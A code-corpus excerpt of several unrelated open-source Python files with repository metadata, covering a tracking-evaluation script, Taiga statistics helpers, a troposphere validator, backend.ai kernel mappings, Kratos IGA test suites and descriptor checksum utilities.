cfg_dict = parse_model_cfg(opt.cfg)
opt.img_size = [int(cfg_dict[0]['width']), int(cfg_dict[0]['height'])]
accs = []
n_frame = 0
timer_avgs, timer_calls = [], []
for seq in seqs:
output_dir = os.path.join(data_root, '..','outputs', exp_name, seq) if save_images or save_videos else None
logger.info('start seq: {}'.format(seq))
dataloader = datasets.LoadImages(osp.join(data_root, seq, 'img1'), opt.img_size)
result_filename = os.path.join(result_root, '{}.txt'.format(seq))
meta_info = open(os.path.join(data_root, seq, 'seqinfo.ini')).read()
frame_rate = int(meta_info[meta_info.find('frameRate')+10:meta_info.find('\nseqLength')])
nf, ta, tc = eval_seq(opt, dataloader, data_type, result_filename,
save_dir=output_dir, show_image=show_image, frame_rate=frame_rate)
n_frame += nf
timer_avgs.append(ta)
timer_calls.append(tc)
logger.info('Evaluate seq: {}'.format(seq))
evaluator = Evaluator(data_root, seq, data_type)
accs.append(evaluator.eval_file(result_filename))
if save_videos:
output_video_path = osp.join(output_dir, '{}.mp4'.format(seq))
cmd_str = 'ffmpeg -f image2 -i {}/%05d.jpg -c:v copy {}'.format(output_dir, output_video_path)
os.system(cmd_str)
timer_avgs = np.asarray(timer_avgs)
timer_calls = np.asarray(timer_calls)
all_time = np.dot(timer_avgs, timer_calls)
avg_time = all_time / np.sum(timer_calls)
logger.info('Time elapsed: {:.2f} seconds, FPS: {:.2f}'.format(all_time, 1.0 / avg_time))
metrics = mm.metrics.motchallenge_metrics
mh = mm.metrics.create()
summary = Evaluator.get_summary(accs, seqs, metrics)
strsummary = mm.io.render_summary(
summary,
formatters=mh.formatters,
namemap=mm.io.motchallenge_metric_names
)
print(strsummary)
Evaluator.save_summary(summary, os.path.join(result_root, 'summary_{}.xlsx'.format(exp_name)))
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='track.py')
parser.add_argument('--cfg', type=str, default='cfg/yolov3.cfg', help='cfg file path')
parser.add_argument('--weights', type=str, default='weights/latest.pt', help='path to weights file')
parser.add_argument('--iou-thres', type=float, default=0.5, help='iou threshold required to qualify as detected')
parser.add_argument('--conf-thres', type=float, default=0.5, help='object confidence threshold')
parser.add_argument('--nms-thres', type=float, default=0.4, help='iou threshold for non-maximum suppression')
parser.add_argument('--min-box-area', type=float, default=200, help='filter out tiny boxes')
parser.add_argument('--track-buffer', type=int, default=30, help='tracking buffer')
parser.add_argument('--test-mot16', action='store_true', help='tracking buffer')
parser.add_argument('--save-images', action='store_true', help='save tracking results (image)')
parser.add_argument('--save-videos', action='store_true', help='save tracking results (video)')
opt = parser.parse_args()
print(opt, end='\n\n')
if not opt.test_mot16:
seqs_str = '''MOT17-02-SDP
MOT17-04-SDP
MOT17-05-SDP
MOT17-09-SDP
MOT17-10-SDP
MOT17-11-SDP
MOT17-13-SDP
'''
data_root = '/home/wangzd/datasets/MOT/MOT17/images/train'
else:
seqs_str = '''MOT16-01
MOT16-03
MOT16-06
MOT16-07
MOT16-08
MOT16-12
MOT16-14'''
data_root = '/home/wangzd/datasets/MOT/MOT16/images/test'
seqs = [seq.strip() for seq in seqs_str.split()]
main(opt,
data_root=data_root,
seqs=seqs,
exp_name=opt.weights.split('/')[-2],
show_image=False,
save_images=opt.save_images,
save_videos=opt.save_videos)
| true | true |
f72ebb099171a1bdd6461c9a7537a443a6f2854c | 3,946 | py | Python | taiga_stats/helpers.py | erikw/taiga_stats | 7e28ffff5169707e248be6a4ab6e31326fc2ca85 | [
"BSD-3-Clause"
] | null | null | null | taiga_stats/helpers.py | erikw/taiga_stats | 7e28ffff5169707e248be6a4ab6e31326fc2ca85 | [
"BSD-3-Clause"
] | null | null | null | taiga_stats/helpers.py | erikw/taiga_stats | 7e28ffff5169707e248be6a4ab6e31326fc2ca85 | [
"BSD-3-Clause"
] | null | null | null | import datetime as dt
import sys
import matplotlib
import taiga_stats.constants as c
matplotlib.use("TkAgg") # Reference: https://stackoverflow.com/a/48374671/265508
DOT_HEADER_FMT = """digraph {:s} {{
labelloc="t";
//labelfontsize="40"
label="{:s}";
//size="7.5,10"
ratio="compress"
//orientation=landscape
"""
def get_tag_str(tag):
return "" if tag == c.TAG_MATCH_ALL else tag
def get_stories_with_tag(project, tag):
uss = project.list_user_stories()
ret_uss = None
if tag == c.TAG_MATCH_ALL:
ret_uss = uss
else:
ret_uss = []
for us in uss:
if us.tags and tag in us.tags:
ret_uss.append(us)
if ret_uss is None or len(ret_uss) == 0:
print(
"Warning: no userstories matching '{:s}' was found.".format(tag),
file=sys.stderr,
)
sys.exit(1)
return ret_uss
def get_us_stauts_id_from_name(project, name):
statuses = project.list_user_story_statuses()
for status in statuses:
if status.name == name:
return status.id
return None
def get_us_status_name_from_id(project, status_id):
statuses = project.list_user_story_statuses()
for status in statuses:
if status.id == status_id:
return status.name
return None
def remove_closed_stories(_project, uss):
ret_uss = []
for us in uss:
if not us.is_closed:
ret_uss.append(us)
return ret_uss
def get_statuses_sorted_by_order(project):
statuses = project.list_user_story_statuses()
return sorted(statuses, key=lambda status: status.order)
def get_statuses_sorted_by_id(project):
statuses = project.list_user_story_statuses()
return sorted(statuses, key=lambda status: status.id)
def get_status_id_sorted(project):
return [status.id for status in get_statuses_sorted_by_order(project)]
def get_status_and_names_sorted(project):
status_ids = get_status_id_sorted(project)[::-1]
status_names = []
for status_id in status_ids:
status_names.append(get_us_status_name_from_id(project, status_id))
return status_ids, status_names
def get_dot_header(name, title):
return DOT_HEADER_FMT.format(name, title)
def get_dot_footer():
return "}"
def read_daily_cfd(path, tag):
data_file = c.CFD_DATA_FILE_FMT.format(get_tag_str(tag))
data_path = "{:s}/{:s}".format(path, data_file)
data = []
try:
with open(data_path, "r", encoding="utf-8") as fdata:
row = 0
for line in fdata:
line = line.rstrip()
parts = line.split("\t")
if row == 0:
data = [[] for _ in range(len(parts) + 1)]
else:
for col in range(len(parts)):
value = parts[col]
if col == 0: # First col is dates
value = dt.datetime.strptime(value, "%Y-%m-%d")
elif col == 1: # Second col is annotations
pass
else:
value = int(value)
data[col].append(value)
row += 1
except IOError as e:
print(
"Could not read {:s}, error: {:s}".format(data_path, str(e)),
file=sys.stderr,
)
sys.exit(2)
return data
class assert_args:
"""
Assert that the given arguments exists.
"""
def __init__(self, *args):
self.needed_args = args
def __call__(self, func):
dec = self
def wrapper(args):
for arg in dec.needed_args:
if arg not in args or args[arg] is None:
print("Required argument ''{:s}' was not supplied on commandline or set in config file.".format(arg))
return 1
func(args)
return wrapper
| 25.79085 | 121 | 0.582615 | import datetime as dt
import sys
import matplotlib
import taiga_stats.constants as c
matplotlib.use("TkAgg")
DOT_HEADER_FMT = """digraph {:s} {{
labelloc="t";
//labelfontsize="40"
label="{:s}";
//size="7.5,10"
ratio="compress"
//orientation=landscape
"""
def get_tag_str(tag):
return "" if tag == c.TAG_MATCH_ALL else tag
def get_stories_with_tag(project, tag):
uss = project.list_user_stories()
ret_uss = None
if tag == c.TAG_MATCH_ALL:
ret_uss = uss
else:
ret_uss = []
for us in uss:
if us.tags and tag in us.tags:
ret_uss.append(us)
if ret_uss is None or len(ret_uss) == 0:
print(
"Warning: no userstories matching '{:s}' was found.".format(tag),
file=sys.stderr,
)
sys.exit(1)
return ret_uss
def get_us_stauts_id_from_name(project, name):
statuses = project.list_user_story_statuses()
for status in statuses:
if status.name == name:
return status.id
return None
def get_us_status_name_from_id(project, status_id):
statuses = project.list_user_story_statuses()
for status in statuses:
if status.id == status_id:
return status.name
return None
def remove_closed_stories(_project, uss):
ret_uss = []
for us in uss:
if not us.is_closed:
ret_uss.append(us)
return ret_uss
def get_statuses_sorted_by_order(project):
statuses = project.list_user_story_statuses()
return sorted(statuses, key=lambda status: status.order)
def get_statuses_sorted_by_id(project):
statuses = project.list_user_story_statuses()
return sorted(statuses, key=lambda status: status.id)
def get_status_id_sorted(project):
return [status.id for status in get_statuses_sorted_by_order(project)]
def get_status_and_names_sorted(project):
status_ids = get_status_id_sorted(project)[::-1]
status_names = []
for status_id in status_ids:
status_names.append(get_us_status_name_from_id(project, status_id))
return status_ids, status_names
def get_dot_header(name, title):
return DOT_HEADER_FMT.format(name, title)
def get_dot_footer():
return "}"
def read_daily_cfd(path, tag):
data_file = c.CFD_DATA_FILE_FMT.format(get_tag_str(tag))
data_path = "{:s}/{:s}".format(path, data_file)
data = []
try:
with open(data_path, "r", encoding="utf-8") as fdata:
row = 0
for line in fdata:
line = line.rstrip()
parts = line.split("\t")
if row == 0:
data = [[] for _ in range(len(parts) + 1)]
else:
for col in range(len(parts)):
value = parts[col]
if col == 0:
value = dt.datetime.strptime(value, "%Y-%m-%d")
elif col == 1:
pass
else:
value = int(value)
data[col].append(value)
row += 1
except IOError as e:
print(
"Could not read {:s}, error: {:s}".format(data_path, str(e)),
file=sys.stderr,
)
sys.exit(2)
return data
class assert_args:
def __init__(self, *args):
self.needed_args = args
def __call__(self, func):
dec = self
def wrapper(args):
for arg in dec.needed_args:
if arg not in args or args[arg] is None:
print("Required argument ''{:s}' was not supplied on commandline or set in config file.".format(arg))
return 1
func(args)
return wrapper
| true | true |
f72ebbd1000cb065fe77e17ce2acc68b098d41f3 | 522 | py | Python | troposphere/validators/appmesh.py | compose-x/troposphere | 9a94a8fafd8b4da1cd1f4239be0e7aa0681fd8d4 | [
"BSD-2-Clause"
] | null | null | null | troposphere/validators/appmesh.py | compose-x/troposphere | 9a94a8fafd8b4da1cd1f4239be0e7aa0681fd8d4 | [
"BSD-2-Clause"
] | null | null | null | troposphere/validators/appmesh.py | compose-x/troposphere | 9a94a8fafd8b4da1cd1f4239be0e7aa0681fd8d4 | [
"BSD-2-Clause"
] | null | null | null | # Copyright (c) 2012-2022, Mark Peek <mark@peek.org>
# All rights reserved.
#
# See LICENSE file for full license.
def validate_listenertls_mode(listenertls_mode):
"""
Validate Mode for ListernerTls
Property: ListenerTls.Mode
"""
VALID_LISTENERTLS_MODE = ("STRICT", "PERMISSIVE", "DISABLED")
if listenertls_mode not in VALID_LISTENERTLS_MODE:
raise ValueError(
"ListernerTls Mode must be one of: %s" % ", ".join(VALID_LISTENERTLS_MODE)
)
return listenertls_mode
| 26.1 | 86 | 0.685824 |
def validate_listenertls_mode(listenertls_mode):
VALID_LISTENERTLS_MODE = ("STRICT", "PERMISSIVE", "DISABLED")
if listenertls_mode not in VALID_LISTENERTLS_MODE:
raise ValueError(
"ListernerTls Mode must be one of: %s" % ", ".join(VALID_LISTENERTLS_MODE)
)
return listenertls_mode
| true | true |
f72ebc3e4aa53fcb0695239a45e7c14928a36718 | 1,159 | py | Python | src/ai/backend/kernel/__init__.py | hephaex/backend.ai-kernel-runner | 0c0978b4825215bd38f417c449745bfbab2db30e | [
"MIT"
] | 1 | 2021-10-04T21:59:34.000Z | 2021-10-04T21:59:34.000Z | src/ai/backend/kernel/__init__.py | hephaex/backend.ai-kernel-runner | 0c0978b4825215bd38f417c449745bfbab2db30e | [
"MIT"
] | null | null | null | src/ai/backend/kernel/__init__.py | hephaex/backend.ai-kernel-runner | 0c0978b4825215bd38f417c449745bfbab2db30e | [
"MIT"
] | null | null | null | import argparse
from .base import BaseRunner
from .terminal import Terminal
__all__ = (
'BaseRunner',
'Terminal',
)
__version__ = '1.4.1'
lang_map = {
'python': 'ai.backend.kernel.python.Runner',
'c': 'ai.backend.kernel.c.Runner',
'cpp': 'ai.backend.kernel.cpp.Runner',
'golang': 'ai.backend.kernel.golang.Runner',
'rust': 'ai.backend.kernel.rust.Runner',
'java': 'ai.backend.kernel.java.Runner',
'haskell': 'ai.backend.kernel.haskell.Runner',
'julia': 'ai.backend.kernel.julia.Runner',
'lua': 'ai.backend.kernel.lua.Runner',
'nodejs': 'ai.backend.kernel.nodejs.Runner',
'octave': 'ai.backend.kernel.octave.Runner',
'php': 'ai.backend.kernel.php.Runner',
'r': 'ai.backend.kernel.r.Runner',
'scheme': 'ai.backend.kernel.scheme.Runner',
'git': 'ai.backend.kernel.git.Runner',
'vendor.aws_polly': 'ai.backend.kernel.vendor.aws_polly.Runner',
}
def parse_args(args=None):
parser = argparse.ArgumentParser()
parser.add_argument('--debug', action='store_true', default=False)
parser.add_argument('lang', type=str, choices=lang_map.keys())
return parser.parse_args(args)
| 29.717949 | 70 | 0.672131 | import argparse
from .base import BaseRunner
from .terminal import Terminal
__all__ = (
'BaseRunner',
'Terminal',
)
__version__ = '1.4.1'
lang_map = {
'python': 'ai.backend.kernel.python.Runner',
'c': 'ai.backend.kernel.c.Runner',
'cpp': 'ai.backend.kernel.cpp.Runner',
'golang': 'ai.backend.kernel.golang.Runner',
'rust': 'ai.backend.kernel.rust.Runner',
'java': 'ai.backend.kernel.java.Runner',
'haskell': 'ai.backend.kernel.haskell.Runner',
'julia': 'ai.backend.kernel.julia.Runner',
'lua': 'ai.backend.kernel.lua.Runner',
'nodejs': 'ai.backend.kernel.nodejs.Runner',
'octave': 'ai.backend.kernel.octave.Runner',
'php': 'ai.backend.kernel.php.Runner',
'r': 'ai.backend.kernel.r.Runner',
'scheme': 'ai.backend.kernel.scheme.Runner',
'git': 'ai.backend.kernel.git.Runner',
'vendor.aws_polly': 'ai.backend.kernel.vendor.aws_polly.Runner',
}
def parse_args(args=None):
parser = argparse.ArgumentParser()
parser.add_argument('--debug', action='store_true', default=False)
parser.add_argument('lang', type=str, choices=lang_map.keys())
return parser.parse_args(args)
| true | true |
f72ebdd68a8fe652c399e7e2317e2c40df3f83a1 | 840 | py | Python | collection/kashiwabara/02_createMediaList.py | nakamura196/toyo_iiif | c36b47a614b87d967956369a15c12da08fca2567 | [
"Apache-2.0"
] | null | null | null | collection/kashiwabara/02_createMediaList.py | nakamura196/toyo_iiif | c36b47a614b87d967956369a15c12da08fca2567 | [
"Apache-2.0"
] | null | null | null | collection/kashiwabara/02_createMediaList.py | nakamura196/toyo_iiif | c36b47a614b87d967956369a15c12da08fca2567 | [
"Apache-2.0"
] | null | null | null | import urllib.request
from bs4 import BeautifulSoup
from time import sleep
import json
import hashlib
import os
from PIL import Image
import glob
files = glob.glob("tmp/*.json")
rows = []
rows.append(["ID", "Original", "Thubmnail", "Width", "Height"])
for file in sorted(files):
filename = file.split("/")[-1]
tmp = filename.replace(".json", "").split("_")
page = int(tmp[1])
if page >= 1:
print(filename)
# jsonファイルを読み込む
f = open(file)
# jsonデータを読み込んだファイルオブジェクトからPythonデータを作成
data = json.load(f)
# ファイルを閉じる
f.close()
rows.append([tmp[0], data["original"], data["thumbnail"], data["width"], data["height"]])
import csv
f = open('data/media.csv', 'w')
writer = csv.writer(f, lineterminator='\n')
writer.writerows(rows)
f.close()
| 17.87234 | 97 | 0.608333 | import urllib.request
from bs4 import BeautifulSoup
from time import sleep
import json
import hashlib
import os
from PIL import Image
import glob
files = glob.glob("tmp/*.json")
rows = []
rows.append(["ID", "Original", "Thubmnail", "Width", "Height"])
for file in sorted(files):
filename = file.split("/")[-1]
tmp = filename.replace(".json", "").split("_")
page = int(tmp[1])
if page >= 1:
print(filename)
f = open(file)
data = json.load(f)
f.close()
rows.append([tmp[0], data["original"], data["thumbnail"], data["width"], data["height"]])
import csv
f = open('data/media.csv', 'w')
writer = csv.writer(f, lineterminator='\n')
writer.writerows(rows)
f.close()
| true | true |
f72ebe8dc117d55ab1f3ff02c98054a97ce7d90a | 5,820 | py | Python | applications/IgaApplication/tests/test_IgaApplication.py | cwx-ae/Kratos | 25e73148a1db56a142650a1e19f195124888c6cd | [
"BSD-4-Clause"
] | 778 | 2017-01-27T16:29:17.000Z | 2022-03-30T03:01:51.000Z | applications/IgaApplication/tests/test_IgaApplication.py | cwx-ae/Kratos | 25e73148a1db56a142650a1e19f195124888c6cd | [
"BSD-4-Clause"
] | 6,634 | 2017-01-15T22:56:13.000Z | 2022-03-31T15:03:36.000Z | applications/IgaApplication/tests/test_IgaApplication.py | cwx-ae/Kratos | 25e73148a1db56a142650a1e19f195124888c6cd | [
"BSD-4-Clause"
] | 224 | 2017-02-07T14:12:49.000Z | 2022-03-06T23:09:34.000Z | # import Kratos
from KratosMultiphysics import *
from KratosMultiphysics.IgaApplication import *
import run_cpp_unit_tests
import KratosMultiphysics.kratos_utilities as kratos_utilities
# Import Kratos "wrapper" for unittests
import KratosMultiphysics.KratosUnittest as KratosUnittest
# Import Iga test factory tests
from iga_test_factory import SinglePatchTest as SinglePatchTest
# Truss tests - python based
from truss_element_tests import TrussElementTests as TTrussElementTests
# Membrane tests
from iga_test_factory import MembraneSinglePatchFourPointSailLinearStatic as MembraneSinglePatchFourPointSailLinearStatic
from iga_test_factory import MembraneSinglePatchFourPointSailNonLinearStatic as MembraneSinglePatchFourPointSailNonLinearStatic
from iga_test_factory import MembraneSinglePatchFourPointSailImplicitDynamic as MembraneSinglePatchFourPointSailImplicitDynamic
# 3p Shell KL - python based
from shell_3p_element_tests import Shell3pElementTests as TShell3pElementTests
# 3p Shell KL
from iga_test_factory import ScordelisRoofShell3pTest as ScordelisRoofShell3pTest
from iga_test_factory import LinearBeamShell3pTest as LinearBeamShell3pTest
# 5p Shell Hierarchic
from iga_test_factory import Shell5pHierarchicLinearThickBeamTest as TShell5pHierarchicLinearThickBeamTest
from iga_test_factory import Shell5pHierarchicLinearScordelisTest as TShell5pHierarchicLinearScordelisTest
from iga_test_factory import Shell5pHierarchicNonLinearThickBeamTest as TShell5pHierarchicNonLinearThickBeamTest
# 5p Shell
from iga_test_factory import ScordelisRoofShell5pTest as ScordelisRoofShell5pTest
# Weak support tests
from iga_test_factory import SinglePatchRefinedSupportPenaltyTest as SinglePatchRefinedSupportPenaltyTest
from iga_test_factory import SinglePatchRefinedSupportLagrangeTest as SinglePatchRefinedSupportLagrangeTest
from iga_test_factory import SinglePatchRefinedSupportNitscheTest as SinglePatchRefinedSupportNitscheTest
# Coupling/C_0 tests
from iga_test_factory import TwoPatchCouplingPenaltyShell3pTest as TwoPatchCouplingPenaltyShell3pTest
from iga_test_factory import TwoPatchCouplingLagrangeShell3pTest as TwoPatchCouplingLagrangeShell3pTest
from iga_test_factory import TwoPatchCouplingNitscheShell3pTest as TwoPatchCouplingNitscheShell3pTest
from iga_test_factory import TwoPatchRefinedCouplingPenaltyMembraneTest as TwoPatchRefinedCouplingPenaltyMembraneTest
from iga_test_factory import TwoPatchRefinedCouplingLagrangeMembraneTest as TwoPatchRefinedCouplingLagrangeMembraneTest
from iga_test_factory import TwoPatchRefinedCouplingNitscheMembraneTest as TwoPatchRefinedCouplingNitscheMembraneTest
# Rotation/G_1 coupling tests
from iga_test_factory import TwoPatchCantileverCouplingPenaltyTest as TwoPatchCantileverCouplingPenaltyTest
from iga_test_factory import TwoPatchCantileverRefinedCouplingPenaltyTest as TwoPatchCantileverRefinedCouplingPenaltyTest
# Nurbs Volume tests
from test_nurbs_volume_element import TestNurbsVolumeElement as TTestNurbsVolumeElements
# Modelers tests
from test_modelers import TestModelers as TTestModelers
has_linear_solvers_application = kratos_utilities.CheckIfApplicationsAvailable("LinearSolversApplication")
def AssembleTestSuites():
''' Populates the test suites to run.
Populates the test suites to run. At least, it should pupulate the suites:
"small", "nighlty" and "all"
Return
------
suites: A dictionary of suites
The set of suites with its test_cases added.
'''
suites = KratosUnittest.KratosSuites
smallSuite = suites['small']
smallSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([
# Single patch test - checks iga essentials
SinglePatchTest,
# Truss tests
TTrussElementTests,
# Membrane tests
MembraneSinglePatchFourPointSailLinearStatic,
MembraneSinglePatchFourPointSailNonLinearStatic,
# 3p Shell KL
TShell3pElementTests,
ScordelisRoofShell3pTest,
LinearBeamShell3pTest,
# 5p Shell Director
ScordelisRoofShell5pTest,
# Weak support tests
SinglePatchRefinedSupportPenaltyTest,
SinglePatchRefinedSupportLagrangeTest,
# Coupling tests
TwoPatchCouplingPenaltyShell3pTest,
TwoPatchCouplingLagrangeShell3pTest,
TwoPatchRefinedCouplingPenaltyMembraneTest,
TwoPatchRefinedCouplingLagrangeMembraneTest,
# Rotation/G_1 coupling tests
TwoPatchCantileverCouplingPenaltyTest,
TwoPatchCantileverRefinedCouplingPenaltyTest,
# Volumes
TTestNurbsVolumeElements,
# Modelers
TTestModelers
]))
if has_linear_solvers_application:
from KratosMultiphysics import LinearSolversApplication
if LinearSolversApplication.HasFEAST():
smallSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([
# Weak support Nitsche test
SinglePatchRefinedSupportNitscheTest,
# Coupling Nitsche tests
TwoPatchCouplingNitscheShell3pTest,
TwoPatchRefinedCouplingNitscheMembraneTest
]))
else:
print("FEAST not available in LinearSolversApplication")
nightSuite = suites['nightly']
nightSuite.addTests(smallSuite)
nightSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([
# Membrane tests
MembraneSinglePatchFourPointSailImplicitDynamic,
# 5p Shell Hierarchic
TShell5pHierarchicLinearThickBeamTest,
TShell5pHierarchicLinearScordelisTest,
TShell5pHierarchicNonLinearThickBeamTest
]))
allSuite = suites['all']
allSuite.addTests(nightSuite)
return suites
if __name__ == '__main__':
KratosUnittest.runTests(AssembleTestSuites())
| 46.56 | 127 | 0.813746 |
from KratosMultiphysics import *
from KratosMultiphysics.IgaApplication import *
import run_cpp_unit_tests
import KratosMultiphysics.kratos_utilities as kratos_utilities
import KratosMultiphysics.KratosUnittest as KratosUnittest
from iga_test_factory import SinglePatchTest as SinglePatchTest
from truss_element_tests import TrussElementTests as TTrussElementTests
from iga_test_factory import MembraneSinglePatchFourPointSailLinearStatic as MembraneSinglePatchFourPointSailLinearStatic
from iga_test_factory import MembraneSinglePatchFourPointSailNonLinearStatic as MembraneSinglePatchFourPointSailNonLinearStatic
from iga_test_factory import MembraneSinglePatchFourPointSailImplicitDynamic as MembraneSinglePatchFourPointSailImplicitDynamic
from shell_3p_element_tests import Shell3pElementTests as TShell3pElementTests
from iga_test_factory import ScordelisRoofShell3pTest as ScordelisRoofShell3pTest
from iga_test_factory import LinearBeamShell3pTest as LinearBeamShell3pTest
from iga_test_factory import Shell5pHierarchicLinearThickBeamTest as TShell5pHierarchicLinearThickBeamTest
from iga_test_factory import Shell5pHierarchicLinearScordelisTest as TShell5pHierarchicLinearScordelisTest
from iga_test_factory import Shell5pHierarchicNonLinearThickBeamTest as TShell5pHierarchicNonLinearThickBeamTest
from iga_test_factory import ScordelisRoofShell5pTest as ScordelisRoofShell5pTest
from iga_test_factory import SinglePatchRefinedSupportPenaltyTest as SinglePatchRefinedSupportPenaltyTest
from iga_test_factory import SinglePatchRefinedSupportLagrangeTest as SinglePatchRefinedSupportLagrangeTest
from iga_test_factory import SinglePatchRefinedSupportNitscheTest as SinglePatchRefinedSupportNitscheTest
from iga_test_factory import TwoPatchCouplingPenaltyShell3pTest as TwoPatchCouplingPenaltyShell3pTest
from iga_test_factory import TwoPatchCouplingLagrangeShell3pTest as TwoPatchCouplingLagrangeShell3pTest
from iga_test_factory import TwoPatchCouplingNitscheShell3pTest as TwoPatchCouplingNitscheShell3pTest
from iga_test_factory import TwoPatchRefinedCouplingPenaltyMembraneTest as TwoPatchRefinedCouplingPenaltyMembraneTest
from iga_test_factory import TwoPatchRefinedCouplingLagrangeMembraneTest as TwoPatchRefinedCouplingLagrangeMembraneTest
from iga_test_factory import TwoPatchRefinedCouplingNitscheMembraneTest as TwoPatchRefinedCouplingNitscheMembraneTest
from iga_test_factory import TwoPatchCantileverCouplingPenaltyTest as TwoPatchCantileverCouplingPenaltyTest
from iga_test_factory import TwoPatchCantileverRefinedCouplingPenaltyTest as TwoPatchCantileverRefinedCouplingPenaltyTest
from test_nurbs_volume_element import TestNurbsVolumeElement as TTestNurbsVolumeElements
from test_modelers import TestModelers as TTestModelers
has_linear_solvers_application = kratos_utilities.CheckIfApplicationsAvailable("LinearSolversApplication")
def AssembleTestSuites():
suites = KratosUnittest.KratosSuites
smallSuite = suites['small']
smallSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([
SinglePatchTest,
TTrussElementTests,
MembraneSinglePatchFourPointSailLinearStatic,
MembraneSinglePatchFourPointSailNonLinearStatic,
TShell3pElementTests,
ScordelisRoofShell3pTest,
LinearBeamShell3pTest,
ScordelisRoofShell5pTest,
SinglePatchRefinedSupportPenaltyTest,
SinglePatchRefinedSupportLagrangeTest,
TwoPatchCouplingPenaltyShell3pTest,
TwoPatchCouplingLagrangeShell3pTest,
TwoPatchRefinedCouplingPenaltyMembraneTest,
TwoPatchRefinedCouplingLagrangeMembraneTest,
TwoPatchCantileverCouplingPenaltyTest,
TwoPatchCantileverRefinedCouplingPenaltyTest,
TTestNurbsVolumeElements,
TTestModelers
]))
if has_linear_solvers_application:
from KratosMultiphysics import LinearSolversApplication
if LinearSolversApplication.HasFEAST():
smallSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([
SinglePatchRefinedSupportNitscheTest,
TwoPatchCouplingNitscheShell3pTest,
TwoPatchRefinedCouplingNitscheMembraneTest
]))
else:
print("FEAST not available in LinearSolversApplication")
nightSuite = suites['nightly']
nightSuite.addTests(smallSuite)
nightSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([
MembraneSinglePatchFourPointSailImplicitDynamic,
TShell5pHierarchicLinearThickBeamTest,
TShell5pHierarchicLinearScordelisTest,
TShell5pHierarchicNonLinearThickBeamTest
]))
allSuite = suites['all']
allSuite.addTests(nightSuite)
return suites
if __name__ == '__main__':
KratosUnittest.runTests(AssembleTestSuites())
| true | true |
f72ebf2c577dad9380f79aaf1c4edf5bb78e7756 | 2,106 | py | Python | test/functional/test_framework/descriptors.py | elestranobaron/litecoin | 1757dde281649c24321c528ef79680897b7ce094 | [
"MIT"
] | 20 | 2021-04-03T09:08:10.000Z | 2022-02-08T23:27:12.000Z | test/functional/test_framework/descriptors.py | elestranobaron/litecoin | 1757dde281649c24321c528ef79680897b7ce094 | [
"MIT"
] | 2 | 2021-04-03T05:41:45.000Z | 2021-09-30T09:38:36.000Z | test/functional/test_framework/descriptors.py | elestranobaron/litecoin | 1757dde281649c24321c528ef79680897b7ce094 | [
"MIT"
] | 3 | 2021-04-16T21:54:02.000Z | 2021-12-17T16:39:04.000Z | #!/usr/bin/env python3
# Copyright (c) 2019 Pieter Wuille
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Utility functions related to output descriptors"""
INPUT_CHARSET = "0123456789()[],'/*abcdefgh@:$%{}IJKLMNOPQRSTUVWXYZ&+-.;<=>?!^_|~ijklmnopqrstuvwxyzABCDEFGH`#\"\\ "
CHECKSUM_CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"
GENERATOR = [0xf5dee51989, 0xa9fdca3312, 0x1bab10e32d, 0x3706b1677a, 0x644d626ffd]
def descsum_polymod(symbols):
"""Internal function that computes the descriptor checksum."""
chk = 1
for value in symbols:
top = chk >> 35
chk = (chk & 0x7ffffffff) << 5 ^ value
for i in range(5):
chk ^= GENERATOR[i] if ((top >> i) & 1) else 0
return chk
def descsum_expand(s):
"""Internal function that does the character to symbol expansion"""
groups = []
symbols = []
for c in s:
if not c in INPUT_CHARSET:
return None
v = INPUT_CHARSET.find(c)
symbols.append(v & 31)
groups.append(v >> 5)
if len(groups) == 3:
symbols.append(groups[0] * 9 + groups[1] * 3 + groups[2])
groups = []
if len(groups) == 1:
symbols.append(groups[0])
elif len(groups) == 2:
symbols.append(groups[0] * 3 + groups[1])
return symbols
def descsum_create(s):
"""Add a checksum to a descriptor without"""
symbols = descsum_expand(s) + [0, 0, 0, 0, 0, 0, 0, 0]
checksum = descsum_polymod(symbols) ^ 1
return s + '#' + ''.join(CHECKSUM_CHARSET[(checksum >> (5 * (7 - i))) & 31] for i in range(8))
def descsum_check(s, require=True):
"""Verify that the checksum is correct in a descriptor"""
if not '#' in s:
return not require
if s[-9] != '#':
return False
if not all(x in CHECKSUM_CHARSET for x in s[-8:]):
return False
symbols = descsum_expand(s[:-9]) + [CHECKSUM_CHARSET.find(x) for x in s[-8:]]
return descsum_polymod(symbols) == 1
| 37.607143 | 116 | 0.603039 |
INPUT_CHARSET = "0123456789()[],'/*abcdefgh@:$%{}IJKLMNOPQRSTUVWXYZ&+-.;<=>?!^_|~ijklmnopqrstuvwxyzABCDEFGH`#\"\\ "
CHECKSUM_CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"
GENERATOR = [0xf5dee51989, 0xa9fdca3312, 0x1bab10e32d, 0x3706b1677a, 0x644d626ffd]
def descsum_polymod(symbols):
chk = 1
for value in symbols:
top = chk >> 35
chk = (chk & 0x7ffffffff) << 5 ^ value
for i in range(5):
chk ^= GENERATOR[i] if ((top >> i) & 1) else 0
return chk
def descsum_expand(s):
groups = []
symbols = []
for c in s:
if not c in INPUT_CHARSET:
return None
v = INPUT_CHARSET.find(c)
symbols.append(v & 31)
groups.append(v >> 5)
if len(groups) == 3:
symbols.append(groups[0] * 9 + groups[1] * 3 + groups[2])
groups = []
if len(groups) == 1:
symbols.append(groups[0])
elif len(groups) == 2:
symbols.append(groups[0] * 3 + groups[1])
return symbols
def descsum_create(s):
symbols = descsum_expand(s) + [0, 0, 0, 0, 0, 0, 0, 0]
checksum = descsum_polymod(symbols) ^ 1
return s + '#' + ''.join(CHECKSUM_CHARSET[(checksum >> (5 * (7 - i))) & 31] for i in range(8))
def descsum_check(s, require=True):
if not '#' in s:
return not require
if s[-9] != '#':
return False
if not all(x in CHECKSUM_CHARSET for x in s[-8:]):
return False
symbols = descsum_expand(s[:-9]) + [CHECKSUM_CHARSET.find(x) for x in s[-8:]]
return descsum_polymod(symbols) == 1
| true | true |
f72ebf40c45cdd85f1466235d3246a9f0f02d062 | 263 | py | Python | duple-api/duple/__init__.py | HughZurname/duple | eed22c2525a32da3b4a429ebadaa950185aa6e66 | [
"MIT"
